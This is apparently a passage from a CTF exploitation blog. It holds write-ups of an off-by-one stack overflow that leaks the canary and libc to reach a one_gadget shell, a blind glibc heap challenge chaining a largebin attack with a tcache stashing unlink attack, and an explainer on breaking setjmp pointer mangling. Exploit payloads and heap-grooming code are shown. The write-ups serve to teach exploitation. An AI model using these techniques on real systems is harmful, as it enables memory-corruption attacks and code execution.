AT_CLKTCK:            100
AT_PHDR:              0x562b9823f040
AT_PHENT:             56
AT_PHNUM:             15
AT_BASE:              0x7fba40214000
AT_FLAGS:             0x0
AT_ENTRY:             0x562b982f3ac0
AT_UID:               1000
AT_EUID:              1000
AT_GID:               1000
AT_EGID:              1000
AT_SECURE:            0
AT_RANDOM:            0x7ffee4809839
AT_HWCAP2:            0x2
AT_EXECFN:            /usr/bin/gdb
AT_PLATFORM:          x86_64
AT_RSEQ_FEATURE_SIZE: 28
AT_RSEQ_ALIGN:        32

looking at the AT_RANDOM entry, we see that it points to the stack. The kernel copies 16 bytes from kernel entropy into the stack at initialization: the first 8 bytes are our canary, the second giant word is our pointer_chk_guard. But why are the values copied into the TCB if they are saved on the stack too? Because every thread needs to access this values. :::

Step 3: exiting gracefully

Now we have everything to get the key, by overwriting the struct with the mangled system() address and /bin/sh as a rgument we simply need to run the program and exit to get a shell.

Still questions about __exit_functions? Here is a link to a nice blogpost.

echo: Srdnlen Quals 2026

David Hermes — Tue, 03 Feb 2026 00:00:00 GMT

What can you do with a single overflowing byte? Well... first let's look at the security mitigations. You'll notice that this is a completely locked-down binary, but that won't stop us.

Disassembly

There are three important functions in this binary:

main(): simply calls our echo function.
echo(): internally calls read_stdin() and prints the read text on stdout.
read_stdin(): a strange wrapper around the standard read() function.

The main function isn't that significant, so we can skip it for brevity and focus directly on echo().

unsigned __int64 echo()
{
  char buffer[64]; // [rsp+0h] [rbp-50h] BYREF
  unsigned __int8 max_chars; // [rsp+40h] [rbp-10h]
  unsigned __int64 canary; // [rsp+48h] [rbp-8h]

  canary = __readfsqword(0x28u);
  memset(s, 0, sizeof(buffer));
  max_chars = 64;
  while ( 1 )
  {
    printf("echo ");
    read_stdin(buffer, max_chars);
    if ( !buffer[0] )
      break;
    puts(buffer);
  }
  return canary - __readfsqword(0x28u);
}

This function does exactly what the name implies: it requests max 64 bytes from stdin and sends it back to stdout through puts(buffer). There doesn't seem to be an overflow here without looking into read_stdin(). Also, that stack canary will definitely be a problem later.

Interestingly the max_chars variable is declared at the start of the function and stored on the stack. But technically it isn't needed, the developer could have simply put the number in the read_stdin() arguments.

Now let's explore the read_stdin() function:

char *__fastcall read_stdin(char *buffer, unsigned __int8 max_chars)
{
  char *char_ptr; // rax
  unsigned __int8 i; // [rsp+1Fh] [rbp-1h]

  for ( i = 0; i <= max_chars; ++i )
  {
    if ( read(0, &buffer[i], 1uLL) != 1 || buffer[i] == '\n' )
    {
      char_ptr = &buffer[i];
      *char_ptr = 0;
      return char_ptr;
    }
  }
  return char_ptr;
}

This function behaves a little strangely: it iterates max_chars + 1 times, reading at each loop one byte. If the byte is a newline, or if we read less than max_chars + 1 bytes, the last byte gets overwritten by a zerobyte \00.

So think about this scenario: max_chars is set to 64, but the loop lets us read up to 65 bytes (i <= max_chars). If we send exactly 65 As without a newline, we write one byte outside the bounds of the buffer without even writing a nullbyte.

But where exactly does the OOB byte land?

One byte to rule them all

Looking at the echo() function we see that the max_chars variable is allocated directly after our buffer on the stack, this is great! With a single byte it is possible to overwrite max_chars with something like 0xFF and get a big buffer overflow.

[rbp-0x50] buffer (64 bytes)  <-- Fills with "A"*64 
[rbp-0x10] max_chars (1 byte) <-- Can be overwritten by "\xFF"

However, we need to precisely chose max_chars! The variable must be exactly the amount of bytes we want to write minus one, else a zerobyte will be added at the end, this could break our exploit.

r.sa(b"echo ", b"A"*64 + b"\x48")

Yet we still have a little hurdle to overcome to get to a return address overwrite: the stack canary.

One byte to leak them

Stack canary have a nice property (or not, depends on the situation), the first byte is always a zerobyte. On one hand it stops us from leaking the canary with a simple print function because the nullbyte acts as a string terminator, on the other hand we can simply overwrite that byte without losing information about the canary.

By overflowing the buffer till the first byte of the canary the logic separation between the string and the canary bytes is lost, as such puts() will continue printing till a nullbyte is reached, this will also leak the saved RBP conveniently.

r.sa(b"echo ", b"A"*64 + b"\x77" + b"B"*7 + b"Z") #0x49 bytes, max_chars must be \x48

[rbp-0x50] buffer (64 bytes)  <-- Fills with "A"*64
[rbp-0x10] max_chars (1 byte) <-- Overwritten by "\x77" (expands loop) 
[rbp-0x0F] padding (7 bytes)  <-- Fills with "B"*7 
[rbp-0x08] canary (8 bytes)   <-- LSB overwritten by "Z"

This will get us:

AAAAA...AAAOBBBBBBBZO\x93;\x11Q_|\xb0\x84D\x80\xfe\x7f
                   |    canary    | Saved Base Pointer |

We can use the Z character as a delimiter to slice the output (this is why we added it), parse the leaked bytes, and reconstruct the canary and the saved RBP.

:::note Remember that the leaked canary will be 7 bytes long, the leading zero byte must be added before unpacking the value with u64(canary_leak). :::

We are finally ready to overwrite the saved return pointer. But what do we point it to? We need one more leak... a pointer to Libc.

Getting a Libc pointer

Remember that the main() is not truly the entrypoint of a C program. If you look at the stack with a debugger directly after main() is called, you will see on the top of the stack the return address to a location inside a function called __libc_start_call_main, as the name suggests this function is stored in the standard library.

00:0000│ rsp 0x7ffc0c2e3678 —▸ 0x7fc4ede2a1ca ◂— mov edi, eax #__libc_start_call_main + ???

We can leak this address exactly like we leaked the other address:

r.sa(b"echo ", b"A"*64 + b"\x5f" + b"b"*7 + b"B"*0x28 + b"C"*7 + b"Z") #0x78 bytes, max_char must be \x77

[rbp-0x50] buffer (64 bytes)   <-- Fills with "A"*64
[rbp-0x10] max_chars (1 bytes) <-- Overwritten by "\x5f"
[rbp-0x0F] padding (7 bytes)   <-- Fills with "b"*7 
[rbp-0x08] canary (8 bytes)    <-- Fills with "B"s
[rbp-0x00] saved RBP (8 bytes) <-- Fills with "B"s
[rbp+0x08] saved RIP (8 bytes) <-- Fills with "B"s
[rbp+0x10] *argv (8 bytes)     <-- Fills with "B"s
[rbp+0x18] argc (4 bytes)      <-- Fills with "B"s
[rbp+0x1c] padding (4 bytes)   <-- Fills with "B"s
[rbp+0x1c] saved RBP (8 bytes) <-- Fills with 7 "C"s and one "Z"

One byte to bring them all

Now we have everything we need. Here is the final exploitation path: We overflow the buffer all the way down to the return address. Along the way, we carefully replace the canary and the base pointer with the values we leaked earlier, acting as if nothing ever happened so the canary check succeeds. Finally, we overwrite the return address to redirect execution to a one_gadget in Libc to get a shell.

Finding the right Libc version

To find the correct libc version on the remote server, libc.blukat.me is our best friend. We can input our leaked libc address and its symbol name to find all libc versions that match that offset. But what symbol should we query for? The functions name is __libc_start_call_main but the leak gives us an address to somewhere in the middle. Fortunately we can use __libc_start_main_ret for exactly this scenario.

It is often helpful to download the newest matched version and if it doesnt work look at the older ones. By using the One_gadget utility from your shell (or directly inside pwndbg) we can get a working gadget.

Now we can send the last echo command!

r.sa(b"echo ", b"\0"*72 + p64(canary_l) + p64(stack_l + 0x8) + p64(libc_l + 0xef52b))

:::note When you have a buffer overflow and control the RBP, you can often make "unusable" one_gadgets viable. For example, the gadget in this exploit requires [rbp-0x78] == NULL. By intentionally moving the RBP and padding our overflow with null bytes, we satisfy the gadget's constraints and successfully trigger a shell! :::

[rbp-0x50] buffer + others (64 bytes)   <-- Fills with "\0"
[rbp-0x08] canary (8 bytes)             <-- Fills with real canary
[rbp-0x00] saved RBP (8 bytes)          <-- Fills with stack_l + 0x8
[rbp+0x08] saved RIP (8 bytes)          <-- Fills with Onegadget

House of Fish: TRX CTF 2026

David Hermes — Mon, 27 Apr 2026 00:00:00 GMT

This past weekend, my team and I participated in the TRX 2026 CTF. It was one of the most difficult CTFs this year (so far, at least). Sadly, I skill-issued my way to the end of the 48 hour competition with zero solves. Luckily, my teammates were much more locked in and solved a bunch of challenges. I only managed to solve this blind heap challenge the day after the event ended, but it incorporates some cool techniques that I want to document for myself and for you. Let's start with the code.

chall.c

I wrote some comments inside the code snippets to make it a little easier to understand. Also notice the complete absence of a read function, as I said before, this is a blind heap challenge, so no leaks.

void create() {
	unsigned int idx;
	unsigned int size;
	void* ptr;
	
	idx = get_idx();   // max 0x100 slots, more than enough...
	size = get_size(); // max 0x500 bytes (gets rounded to the next multiple of 16!!!)
	
	ptr = malloc(size);
	printf("allocated size: %d\n", size);
	
	ptrs[idx] = ptr;
	sizes[idx] = size;
}

void update() {
	unsigned int idx;
	
	idx = get_idx();
	
	printf("enter %d bytes: ", sizes[idx]);
	// this function expects exactly sizes[idx] bytes, no more no less. 
	read_exactly(STDIN_FILENO, ptrs[idx], sizes[idx]);
}

void delete() {
	unsigned int idx;
	
	idx = get_idx();
	free(ptrs[idx]); //use after free vulnerability!
}

void copy() {
	unsigned int dest;
	unsigned int src;
	
	dest = get_idx(); 
	src = get_idx();
	
	// because of the rounding in create() it is not possible to copy 0x8 bytes, only multiples of 16.
	
	memcpy(ptrs[dest], ptrs[src], min(sizes[dest], sizes[src]));
}

//This is one of the menu options, so we only need to write that 16 bytes value into *admin
void win() {
	if (*admin == 0xdeadbeefdeadcafe) {
		puts("good boy");
		system("/bin/sh");
	} else 
		die("admin");
}

You notice that admin variable? It contains a pointer to a mapped memory area with a fixed address.

admin = (unsigned long*) mmap((void*) 0x1337000, 8, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);

This is very important because it is the only pointer we know of in the entire binary. Looking at the checksec output confirms this.

blind heap exploitation

We need a way to make malloc() return our admin pointer instead of a normal chunk. this would normally be solved by a tcache poisoning attack. But without a leak, we cannot recover the mangling key (I wrote about this key in a past writeup: link). So is it possible to make malloc return an arbitrary memory location through tcache without having to deal with the mangling key? Well...

tcache stashing unlink attack

This technique abuses a mechanism within the smallbins to move a user-controlled pointer into the tcache without needing to leak the tcache mangling key.

smallbins

Smallbins are circular doubly-linked lists that operate in a FIFO (First-In, First-Out) fashion, unlike LIFO (Last-In, First-Out) used by the tcache and fastbins. New chunks are inserted at the head (the front) of the bin and removed from the tail (the back) for allocation. On 64-bit systems, smallbins manage chunks ranging from 0x20 to 0x3F0 bytes. Smallbins have no fixed count limit, unlike tcache chunks.

Looking at the size classes of the smallbin chunk it is possible to notice an overlap with tcache sizes. The reason can be explained by understanding that tcache lists can store only seven elements. When the tcache is full, the allocator must decide where to store the currently freed chunk. Chunks fitting fastbin sizes (typically 0x20 to 0x80 bytes) are stored in the fastbins. Larger chunks (up to 0x3F0 bytes for smallbins) are first placed into the Unsorted Bin. They are only sorted into their respective smallbins during a subsequent malloc request.

tcache stashing

Because we mostly prefer to have our target chunk in the tcache, we can leverage a smallbin mechanism called tcache stashing. Simply put, when the tcache is empty and a chunk from a smallbin is requested, the requested chunk is returned to the user, and all remaining chunks in that smallbin size class get moved into the tcache. The major advantage here is that smallbins do not mangle their pointers. Therefore, if we can poison a smallbin chunk, we can move a user controlled pointer into the tcache without having to leak a mangled pointer.

Let's look at the glibc code that handles the stashing:


// GLIBC 2.39 _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L3998)

if (in_smallbin_range (nb))
    {
		
		... malloc returns smallbin chunk ...
		
	      /* While bin not empty and tcache not full, copy chunks over.  */
	    while (tcache->counts[tc_idx] < mp_.tcache_count
			&& (tc_victim = last (bin)) != bin) {
			
			//tc_victim is the chunk we want to stash, as you can see we always take the last one from the smallbin.
			
			if (tc_victim != 0) 
			{
		    bck = tc_victim->bk; //the chunk before the last one.
		    set_inuse_bit_at_offset (tc_victim, nb);
			if (av != &main_arena)
				set_non_main_arena (tc_victim);
			    bin->bk = bck;   // Vulnerability
			    bck->fd = bin;   
			    tcache_put (tc_victim, tc_idx);
		    }
		}
	}

If we poison the bk pointer of a smallbin chunk so that it points to an arbitrary memory area, once the chunk gets stashed, at the next iteration, tc_victim will equal our arbitrary memory pointer.

But the line directly after our vulnerability creates a problem: bck->fd = bin dereferences the value stored in the bk position of our fake chunk. Consequently, it is necessary that the bk field of our fake chunk contains a valid, writable address. This ensures the pointer can be dereferenced without crashing, allowing the execution to successfully reach the tcache_put(my_pointer, tc_idx) function.

We also need to remember that the stashing mechanism will try to move seven chunks into the tcache list. When we poison a smallbin chunk we destroy the circular linked list, this means that we need to be careful about what chunk we poison, best practice is to modify the 6th chunk so that our fake admin chunk becomes the seventh.

:::warning This method alone will not work. Our admin memory area is completely empty, so this method would try to dereference a non-existing pointer in admin + 0x08 and immediately crash the program.

bck = tc_victim->bk; // Reads from admin + 0x08 ...
bck->fd = bin;       // Segfaults if bck isn't a valid, writable pointer

But let's imagine that there is a pointer for argument’s sake, we will learn later how to move a pointer to that position. :::

The attack in practice

:::note You can find a more general explanation of this attack in the shellfish how2heap repo: link :::

We can allocate 7 chunks of size 0x90 that will be used to fill the tcache. After that, we generate 6 chunks of the same size destined for the smallbin list, allocating 0x10 guard chunks after each of them so that they do not get coalesced. Then, we free the 7 tcache chunks, followed by the 6 smallbin chunks (but not the guard chunks). The 6 smallbin chunks will be placed in the unsortedbin first, we must allocate a sufficiently large chunk so that the remaining chunks get moved into the smallbin list.

Now we can edit the top smallbin chunk's bk pointer by overwriting the pointer with the &admin - 0x10 address, after this the bins view changes slightly:

If we now allocate 8 0x90 sized chunks we would find the admin pointer in the tcache bin! But as i said before we still that pointer in the bk field.

Largebin attack

This attack will help us move a heap pointer to the admin area, it is not really important what kind of pointer we use, as long as it is dereferenceable and the memory area it points to is writable. For this we need to understand how largebins work.

Largebins

Largebins follow some of the same basic rules as smallbins: freed chunks get stored in the unsorted bins and if they are of the required size (0x400 bytes for x86 64 bit) they are sorted into the largebins at the next malloc call. They also possess the normal fd and bk pointers to maintain the doubly linked list property. In largebins, this primary list is sorted in strictly decreasing order by chunk size.

A notable addition is a second circular doubly linked list. For efficiency reasons different sizes are stored in the same bin (0x400 - 0x43F, 0x440 - 0x47F, etc.). The fd_nextsize and bk_nextsize pointers are used to quickly jump to the right size without having to scan every single chunk, these pointers are only used by the first chunk of a specific size-subclass. To remove the overhead of having to move the _nextsize pointers, a malloc operation will remove the tail chunk of a specific size.

Example scenario

When new chunks of a preexisting size are added, they get appended after the same size head chunk. The diagram below shows that LC3 was the first 0x420 chunk added, making it the head that maintains the _nextsize pointers. When LC4 is sorted in, it is added directly after the head. Additionally a possible LC7 with size 0x420 would be added between LC3 and LC4. When a chunk gets malloced with size 0x420 the tail chunk is removed, in our example that is LC4.

The attack

The attack consists in an arbitrary heap pointer write, perfect for the dereferencing problem we have with the tcache stashing unlink attack. The following _int_malloc() code handles the sorting of a new chunk (victim) into the largebin in the specific case in which it is the absolute smallest chunk being added.

// GLIBC 2.39 _int_malloc https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L4169

victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
if (fwd != bck) {

    ... stuff ...
    
    /* if smaller than smallest, bypass loop below */
    assert (chunk_main_arena (bck->bk));
    if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) {
        fwd = bck; //the bin
        bck = bck->bk; //last chunk
        
        victim->fd_nextsize = fwd->fd; //the biggest head chunk
        
        victim->bk_nextsize = fwd->fd->bk_nextsize; // !!!
        fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // !!!
        //  the line above can be rewritten as
        //  fwd->fd->bk_nextsize = victim;
        //  victim->bk_nextsize->fd_nextsize = victim;
    }
    else
    {
	    ... stuff ...

I marked the important lines with some exclamation marks. Let's imagine we have a big chunk in the largebin, and we are currently moving a smaller one into the same largebin. If we poison the bk_nextsize of the large chunk to another writable address, for example &admin, this code changes:

victim->bk_nextsize = admin; //&admin gets stored in bk_nextsize of our victim.
fwd->fd->bk_nextsize = victim; //not important
victim->bk_nextsize->fd_nextsize = victim; //we store a pointer to victim inside the fd_nextsize of admin (admin+0x18)

Knowing this we simply need to save into victim->bk_nextsize = admin-0x18. In this way the pointer will be stored exactly in the bk position for the stashing unlink attack.

:::note You can find a more general explanation of this attack in the shellfish how2heap repo: link :::

Exploit goes brrr

Now that we understand how the two vulnerabilities work, we can chain them. We need to be careful to not break anything, let's start with the largebin part:

    create(r, 1, 0x420) #Big one, we want to poison this one
    create(r, 2, 0x10)  #Guard
    create(r, 3, 0x410) #Small one, our victim
    create(r, 0, 0x10)  #Guard
    
    #Deleting chunk and allocating bigger chunk to move it to largebins
    delete(r, 1)        
    create(r, 0, 0x4a0)
    
    #Poisoning the large chunk 
    copy(r, 2, 1)
    update(r, 1, b"A"*0x10 + p64(0) + p64(admin-0x18) + b"B"*0x400)
    copy(r, 1, 2)
    
    #Deleting the small one
    delete(r, 3)
    create(r, 0, 0x4a0)
    
    #Cleaning the heap because we are good citizens
    create(r, 0, 0x400)
    create(r, 0, 0x3e0)
    create(r, 0, 0x30)

The last part helps to remove trash from the freelists. Now we can look in the *admin area where there should be a pointer now.

After this, the stage is prepared for our smallbin shenanigans.

	#creating 7 tcache chunks 
    for a in range(4, 11):
        create(r, a, 0x90)
    
    #creating 6 smallbin chunks + guards
    for a in range(11, 17):
        create(r, a, 0x90)
        create(r, 0, 0x10) #guard
       
    #populating tcache and smallbins
    for a in range(4, 17):
        delete(r, a)
    create(r, 0, 0x400)
    
    #Poisoning the last smallbin added (head of the list)
    update(r, 16, p64(0) + p64(admin-0x10) + b"B"*0x80)
    
    #Removing the tcache bins
    for a in range(7):
        create(r, 0, 0x90)
       
	#Triggering stash unlink
    create(r, 0, 0x90)

Looking in the bins we should see our chunk in the tcache list ready to be used.

The rest is easy. By allocating two chunks and writing in the second we can modify the admin area and write the text required, by triggering that menu option we get the flag.

setjmp: jmp_buf exploitation

David Hermes — Fri, 29 May 2026 00:00:00 GMT

I participated in the TeamItaly.IT quals this weekend, the Italian pre-qualification CTF for the national team. One of the challenges centered around the setjmp() and longjmp() libc functions. I couldn't find many resources explaining their internals in a ctf context, so here is a short post on this fun technique.

setjmp and longjmp

While a standard goto can only jump within the same function, the setjmp and longjmp combo acts as a non-local goto.

setjmp stores the state of the callee saved registers (RBX, RBP R12-R15), stack pointer, and instruction pointer into a buffer, and then returns zero. When longjmp is subsequently called, the registers get restored from the buffer. setjmp writes its return address as the saved instruction pointer. This means that longjmp will jump directly after the setjmp call, additionally it will set the return value (stored in rax) to the val argument passed to longjmp.

 #include <setjmp.h>
 int setjmp(jmp_buf env); //returns 0 when called directly
 void longjmp(jmp_buf env, int val);

jmp_buf

So, how does setjmp exactly save our registers? Well, looking into the libc implementation, we find this interesting typedef:

//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/setjmp/setjmp.h#L36
typedef struct __jmp_buf_tag jmp_buf[1];

jmp_buf is defined as an array of only one element of type __jmp_buf_tag. This is cool because when an array is passed in a function call, it "decays" into a pointer. Without this trick, we would need to prepend an & in front of the argument. Let's look at __jmp_buf_tag now:

//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/setjmp/bits/types/struct___jmp_buf_tag.h#L26
/* Calling environment, plus possibly a saved signal mask.  */
struct __jmp_buf_tag
{
	__jmp_buf __jmpbuf;		/* Calling environment.  */
	int __mask_was_saved;	/* Saved the signal mask?  */
	__sigset_t __saved_mask;	/* Saved signal mask.  */
};

This struct doesn't really tell us much. Why are we now reading the word signal? Well, there is a variation of setjmp called sigsetjmp (along with siglongjmp) that also saves the signal mask into the buffer.

So for our case, only the first element of __jmp_buf_tag is interesting. Let's look at it:

//glibc https://elixir.bootlin.com/glibc/glibc-2.43.9000/source/sysdeps/x86/bits/setjmp.h#L31
typedef long int __jmp_buf[8];

It's literally an 8-element, 64-bit integer array, nothing special. If we want to understand how the values are saved inside this array, it is easier to look directly through the lens of a debugger than to search through a huge amount of different implementations of setjmp for all architectures. For x86-64, this is the __jmp_buf[8] struct:

`__jmp_buf[8]`	is mangled
`RBX`	no
`RBP`	yes
`R12`	no
`R13`	no
`R14`	no
`R15`	no
`RSP`	yes
`RIP`	yes

Wait, what does mangled mean? Well, let's look at this example of a __jmp_buf[8] struct:

As you can notice, RBP, RSP, and RIP should all be addresses, but they got mangled in some way. This means that we cannot simply overwrite them with a new address to modify these registers.

breaking the mangling

By setting a breakpoint in the __longjmp function in GDB, it is possible to understand exactly how the function demangles the pointers.

It first executes a ror of 17 bits (0x11), and then it XORs the resulting value with a predetermined key taken from the Thread Control Block at offset 0x30 (fs:0x30).

:::note When the OS loads a binary, it stores two qwords of random data in the Thread Control Block (TCB). The first qword is used as a stack canary (fs:0x28), and the second qword is used for pointer mangling. The exit_funcs use the same mangling key as setjmp (link to an old writeup). :::

This means that as long as we have a leak of the return address, it is possible, for example, to recover the key this way:

def recover_key(mangled_addr:int, real_addr:int):
	return ror(mangled_addr, 0x11, 64) ^ real_addr

After that, we can mangle an arbitrary pointer by doing the reverse of the demangling operation:

def mangle_addr(real_addr:int, key:int):
	return rol(real_addr ^ key, 0x11, 64)

CTF challenges

If you want to try this technique, I will add a list of challenges below:

txvm (Teamitaly 2026 Quals): waiting for release

Ub1k's Blog | Capture The Flag & Vulnerability Research

he_protecc: CornCTF 2025

he_protecc: CornCTF 2025

Looking around

mmap my beloved

seccomp

Leak & Pwn

The Leak

Assembly

Babyheap: JustCTF - Chapter 1

The disassembly

Heap Exploitation

The bins

tcache poisoning

The Plan

House of something

Reasoning about chunks

tcache_perthread_struct

You are 0x440 bytes big, trust me

ROP exploit using __environ

The __environ variable

The ROP chain

Babyheap: JustCTF - Chapter 2

scanf and black magic

Ocean of scanf

Deep into malloc

Putting it all together.

Exploiting with exit_func overwrite

Putting it all together

Step 1: Getting the __exit_funcs struct

Step 2: Replacing function with system()

Step 3: exiting gracefully

echo: Srdnlen Quals 2026

Disassembly

One byte to rule them all

One byte to leak them

Getting a Libc pointer

One byte to bring them all

Finding the right Libc version

House of Fish: TRX CTF 2026

chall.c

blind heap exploitation

tcache stashing unlink attack

smallbins

tcache stashing

The attack in practice

Largebin attack

Largebins

Example scenario

The attack

Exploit goes brrr

setjmp: jmp_buf exploitation

setjmp and longjmp

jmp_buf

breaking the mangling

CTF challenges

ROP exploit using `__environ`